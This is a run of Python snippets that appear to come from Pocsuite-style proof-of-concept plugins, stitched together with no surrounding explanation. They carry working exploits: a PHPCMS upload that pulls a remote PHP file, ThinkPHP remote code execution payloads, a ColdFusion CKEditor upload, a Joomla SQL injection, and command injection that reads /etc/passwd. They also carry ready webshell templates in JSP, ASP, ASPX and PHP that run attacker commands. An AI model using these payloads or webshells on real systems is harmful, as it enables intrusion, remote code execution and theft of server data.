def _verify(self): result = {} url = self.url + "/index.php?m=member&c=index&a=register&siteid=1" username = randomStr(6) password = randomStr(6, '1234567890') data = { "siteid": "1", "modelid": "1", "username": "******" % (username), "password": "******" % (password), "email": "*****@*****.**" % (username), "info[content]": "<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ", "dosubmit": "1", "protocol": "", } match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php" resp = req.post(url, data=data) shell = re.findall(match, resp.text) shellinfo = ''.join(shell[0]) + ".php" if shell: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url shell_resp = req.get(shellinfo) if shell_resp.status_code == 200: result['VerifyInfo']['webshell'] = shellinfo return self.parse_attack(result)
def _verify(self): def vul_check(payload): url = urlparse.urljoin(base_url, payload) create_verify_file = req.get(url) get_verify_str = req.get(verify_url) return get_verify_str result = {} base_url = self.url if (urlparse.urlparse(base_url).port) is None: base_url = base_url + ":80" verify_str = randomStr(6) verify_filename = randomStr(3) verify_url = urlparse.urljoin(base_url, verify_filename + ".php") payload_list = [ "index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]={}.php&vars[1][]=<?php echo '{}';?>" .format(verify_filename, verify_str), "index.php?s=index/\\think\\template\driver\\file/write?cacheFile={}.php&content=<?php echo '{}';?>" .format(verify_filename, verify_str) ] if any(verify_str in vul_check(x) for x in payload_list): result['VerifyInfo'] = "success" # result['VerifyInfo'] = {} # result['VerifyInfo']['URL'] = self.url # result['VerifyInfo']['RESULT'] = "success" return self.parse_output(result)
class JspShell(Webshell): _keyword = randomStr(20) _content = '<%@ page import="java.util.*,java.io.*" %>\n' \ '<%@ page import="java.io.*"%>\n' \ '<%@ page import="java.util.*"%>\n' \ '<%\n' \ 'if (request.getParameter("check") == "1")\n' \ ' out.println("202cTEST4b70".replace("TEST","' + _keyword + '"));\n' \ 'if (request.getParameter("{0}") != null)\n' \ '{{\n' \ ' Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));\n' \ ' OutputStream os = p.getOutputStream();\n' \ ' InputStream in = p.getInputStream();\n' \ ' DataInputStream dis = new DataInputStream(in);\n' \ ' String disr = dis.readLine();\n' \ ' while ( disr != null)\n' \ ' {{\n' \ ' out.println(disr);\n' \ ' disr = dis.readLine();\n' \ ' }}\n' \ '\n}}' \ '%>\n' _password = '******' _check_data = {'check': '1'} _keyword = '202c%s4b70' % _keyword
class AspShell(Webshell): _keyword = randomStr(20) _password = '******' _content = '<%eval request("{0}")%>' _check_statement = 'Response.Write(Replace("202cTEST4b70","TEST",' \ '"' + _keyword + '"))' _keyword = '202c%s4b70' % _keyword
def _verify(self): result = {} self.raw_url = self.url host = urlparse.urlparse(self.url).hostname port = urlparse.urlparse(self.url).port scheme = urlparse.urlparse(self.url).scheme if port is None: port = "80" else: port = str(port) if "https" == scheme: self.url = "%s://%s" % (scheme, host) else: self.url = "%s://%s:%s" % (scheme, host, port) try: flag = randomStr(10) check = self.run_cmd("echo${IFS}" + flag).split("\n")[0] if flag == check: result["VerifyInfo"] = {} result["VerifyInfo"]["url"] = self.url result["VerifyInfo"]["passwd"] = self.run_cmd( "cat${IFS}%2fetc%2fpasswd") result["VerifyInfo"]["hosts"] = self.run_cmd( "cat${IFS}%2fetc%2fhosts") except Exception as e: pass return self.parse_output(result)
def _verify(self): def vul_check(payload): url = urlparse.urljoin(base_url, payload) sock = socket.socket() sock.connect(("127.0.0.1", 8080)) sock.send('GET /{} HTTP/1.0\r\n'.format(payload).encode('ascii')) sock.send('Host: 127.0.0.1\r\n'.encode('ascii')) sock.send('\r\n'.encode('ascii')) str_five = 'testssdfsf' * 200 sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.send(str_five.encode('ascii')) sock.close() get_verify_str = req.get(verify_url) return get_verify_str result = {} base_url = self.url if (urlparse.urlparse(base_url).port) is None: base_url = base_url + ":80" verify_str = randomStr(6) verify_filename = randomStr(3) verify_url = urlparse.urljoin(base_url, verify_filename + ".php") payload_list = [ "index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]={}.php&vars[1][]=%3C?php%20echo%20\'{}\';?%3E" .format(verify_filename, verify_str), "index.php?s=index/\\think\\template\driver\\file/write?cacheFile={}.php&content=%3Cphp%20echo%20\'{}\';?%3E" .format(verify_filename, verify_str) ] if any(verify_str in vul_check(x) for x in payload_list): result['VerifyInfo'] = "success" return self.parse_output(result)
class AspxVerify(VerifyShell): _keyword = randomStr(20) _content = '<%@ Page Language="Jscript" ContentType="text/html" ' \ 'validateRequest="false" aspcompat="true"%>\n' \ '<%Response.Write("202cTEST4b70".Replace("TEST",' \ '"' + _keyword + '"))%>\n' \ '<%System.IO.File.Delete(Request.PhysicalPath);%>' _keyword = '202c%s4b70' % _keyword
class AspxShell(Webshell): _keyword = randomStr(20) _password = '******' _content = '<%@ Page Language="Jscript"%>' \ '<%eval(Request.Item["{0}"],"unsafe");%>' _check_statement = 'Response.Write("202cTEST4b70".Replace("TEST",' \ '"' + _keyword + '"))' _keyword = '202c%s4b70' % _keyword
class AspVerify(VerifyShell): _keyword = randomStr(20) _content = '<%\n' \ 'Response.Write(Replace("202cTEST4b70","TEST",' \ '"' + _keyword + '"))\n' \ 'CreateObject("Scripting.FileSystemObject").' \ 'DeleteFile(Request.ServerVariables("Path_Translated"))\n' \ '%>' _keyword = '202c%s4b70' % _keyword
def _verify(self): '''verify mode''' result = {} if urlparse(self.url).port is None: self.url = self.url + ":8500" url = urljoin( self.url, '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm') filename = randomStr(6) content = randomStr(12) data = "-----------------------------24464570528145\r\n" data += "Content-Disposition: form-data; name=\"file\"; filename=\"{filename}\"\r\n".format( filename=filename) data += "Content-Type: image/jpeg\r\n" data += "\r\n" data += "{content}\r\n".format(content=content) data += "-----------------------------24464570528145\r\n" data += "Content-Disposition: form-data; name=\"path\"\r\n" data += "\r\n" data += "we\r\n" data += "-----------------------------24464570528145--\r\n" header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Content-Type": "multipart/form-data; boundary=---------------------------24464570528145" } req.post(url, headers=header, data=data) file_path = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/" + filename file_url = urljoin(self.url, file_path) response = req.get(file_url) if content in response.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Shell'] = file_url return self.parse_output(result)
class JspVerify(VerifyShell): _keyword = randomStr(20) _content = '<%@ page import="java.util.*,java.io.*" %>\n' \ '<%@ page import="java.io.*"%>\n' \ '<%@ page import="java.util.*"%>\n' \ '<%\n' \ 'String path=request.getRealPath("")+request.getServletPath();\n' \ 'out.println(path);\n' \ 'File d=new File(path);\n' \ 'if(d.exists()){{\n' \ ' d.delete();\n' \ ' }}\n' \ '%>\n' \ '<% out.println("202cTEST4b70".replace("TEST","' + _keyword + '"));%>' _keyword = '202c%s4b70' % _keyword
def _verify(self): '''verify mode''' result = {} joomla_session = req.session() self.get_pass(joomla_session) rand_str = randomStr(10, "0123456789") url = urljoin(self.url, '/administrator/index.php?option=com_users&view=notes') sqli_payload = 'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'.format( randstr=rand_str) r = joomla_session.post(url=url, headers=self.headers, data=sqli_payload) if r.status_code == 500 and hashlib.md5( rand_str).hexdigest()[0:31] in r.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url return self.parse_output(result)
def _verify(self): """verify mode""" result = {} self.url = self.url + '/index.php?s=captcha' token = randomStr() cmd = "echo {}".format(token) headers = { 'Content-Type': 'application/x-www-form-urlencoded', } exploitdata = { '_method': '__construct', 'filter[]': 'system', 'method': 'get', 'server[REQUEST_METHOD]': cmd } matchstring = 'system error' resp = req.post(self.url, data=exploitdata, headers=headers) if matchstring in resp.content.lower() and token in resp.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_output(result)
class PhpVerify(VerifyShell): _keyword = randomStr(20) _content = "<?php var_dump(md5(" + _keyword + "));unlink(__FILE__);?>"
class PhpVerify(VerifyShell): _keyword = randomStr(20) _content = '<?php var_dump("202c{0}4b70");unlink(__FILE__);?>'.format(_keyword)
class PhpShell(Webshell): _keyword = randomStr(20) _password = '******' _content = "<?php @assert($_REQUEST['{0}']);?>" _check_statement = 'var_dump(md5(' + _keyword + '));'
class PhpShell(Webshell): _keyword = randomStr(20) _password = '******' _content = "<?php @assert($_REQUEST['{0}']);var_dump('202c{1}4b70')?>".format(_password, _keyword)